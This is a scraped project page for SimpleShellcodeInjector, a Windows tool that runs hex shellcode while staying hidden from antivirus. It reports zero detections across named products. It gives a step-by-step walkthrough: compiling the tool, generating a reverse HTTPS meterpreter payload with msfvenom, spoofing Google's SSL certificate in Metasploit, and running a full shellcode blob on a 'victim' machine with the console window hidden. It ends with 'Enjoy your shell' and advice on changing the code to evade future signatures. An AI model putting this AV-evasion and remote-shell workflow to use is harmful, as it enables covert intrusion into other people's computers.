Need help with SimpleShellcodeInjector?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

224 Stars 75 Forks 17 Commits 1 Opened issues


SimpleShellcodeInjector receives as an argument a shellcode in hex and executes it. It DOES NOT inject the shellcode in a third party application.

Services available


Need anything else?

Contributors list

# 152,787
17 commits

SimpleShellcodeInjector (SSI)



SimpleShellcodeInjector or SSI receives as an argument a shellcode in hex and executes it. It DOES NOT inject the shellcode in a third party application and it stays under the radar for tools like Get-InjectedThread.
At the moment, many antivirus solutions will not detect it, even when you execute a meterpreter's shellcode, without obfuscation.
Let me note that, although you can use SSI in order to recieve a meterpreter, it is NOT a stager for metasploit. It just executes the shellcode you feed it.

Antivirus Detection (Rate: 0/30)

Actively Tested

At the moment, it has been actively tested against the following solutions (default settings - fully updated) and it returned a reverse meterpreter with success:

  • Windows Defender
  • Symantec Endpoint Protection
  • Kaspersky
  • ESET - Smart Security Premium (trial version)

Victim's OS: Windows 10 64 bit



Detection rate (0/26)

Scan Date: 20-04-2019 20:00:38

d-Aware Antivirus: Clean

AhnLab V3 Internet Security: Clean

Alyac Internet Security: Clean

Avast: Clean

AVG: Clean

Avira: Clean

BitDefender: Clean

BullGuard: Clean

ClamAV: Clean

Comodo Antivirus: Clean

DrWeb: Clean

Emsisoft: Clean

Eset NOD32: Clean

Fortinet: Clean

F-Secure: Clean


Kaspersky: Clean

McAfee: Clean

Malwarebytes: Clean

Panda Antivirus: Clean

Sophos: Clean

Trend Micro Internet Security: Clean

Webroot SecureAnywhere: Clean

Windows 10 Defender: Clean

Zone Alarm: Clean

Zillya: Clean

Example Usage

A reverse https meterpreter example is being provided below. However, you can use any shellcode you like.

Important Note: Although some security solutions like Windows Defender do not detect the SSI as a virus, they can detect other factors which are not related to the SSI.For example they might detect metasploit's default certificate or the reverse tcp meterpreter.

Attacker's Machine: Generate payload for SSI: ```sh $ i686-w64-mingw32-gcc SimpleShellcodeInjector.c -o ssi.exe $ msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 -f c -o msf.txt [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 545 bytes Final size of c file: 2315 bytes Saved as: msf.txt

$ cat msf.txt|grep -v unsigned|sed "s/\"\\x//g"|sed "s/\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"


*Prepare Metasploit - SSL impersonation:*
sh $ msfconsole msf exploit(multi/handler) > use auxiliary/gather/impersonatessl msf auxiliary(gather/impersonatessl) > set RHOST RHOST => sf auxiliary(gather/impersonate_ssl) > run

[] - Connecting to [] - Copying certificate from /C=US/ST=California/L=Mountain View/O=Google LLC/ [] - Beginning export of certificate files [] - Creating looted key/crt/pem files for [+] - key: /home/gweeperx/.msf4/loot/ [+] - crt: /home/gweeperx/.msf4/loot/ [+] - pem: /home/gweeperx/.msf4/loot/ [*] Auxiliary module execution completed

*Prepare Metasploit - Handler:*

msf auxiliary(gather/impersonate_ssl) > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(multi/handler) > set HandlerSSLCert /home/gweeperx/.msf4/loot/
HandlerSSLCert => /home/gweeperx/.msf4/loot/
msf exploit(multi/handler) > set LHOST
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 

<p><strong>Victim's Machine:</strong>
C:\Users\gweeperx\Desktop&gt;ssi.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a03535368bb010000e81a0100002f303430705247463070385f53396450306959436451676264466553636e6c4346787333785a4e4a4a355072346d6430634b6f68366e64374d634973644b4239646249463958534c3435325f76456c74785472556452644b6e77447275547762767630794b5069796d544c726751395f2d326e7a626f30336530527255346848664961694a6f644f634a00506857899fc6ffd589c653680032e08453535357535668eb552e3bffd5966a0a5f688033000089e06a04506a1f566875469e86ffd55353535356682d06187bffd585c0751468881300006844f035e0ffd54f75cde84a0000006a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cf8b0701c385c075e558c35fe86bffffff31302e31302e3131332e32303800bbf0b5a2566a0053ffd5
 +-+-+-+ +-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+
 |S|S|I| |(|S|i|m|p|l|e| |S|h|e|l|l|c|o|d|e| |I|n|j|e|c|t|o|r|)|
 +-+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+
 |b|y| |g|w|e|e|p|e|r|x|
 +-+-+ +-+-+-+-+-+-+-+-+</p>

<p>Ready? Go!
  • Note: I am hiding the cmd window, so you will see not output from the SSI*

Enjoy your shell.


I tried to make it as simple as i could, in hope that it will be easy for anyone to make a few changes in the code and avoid AV signatures which will arise after the release of this tool.

DON'T forget to wear your white hat before you use it. ;-)

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.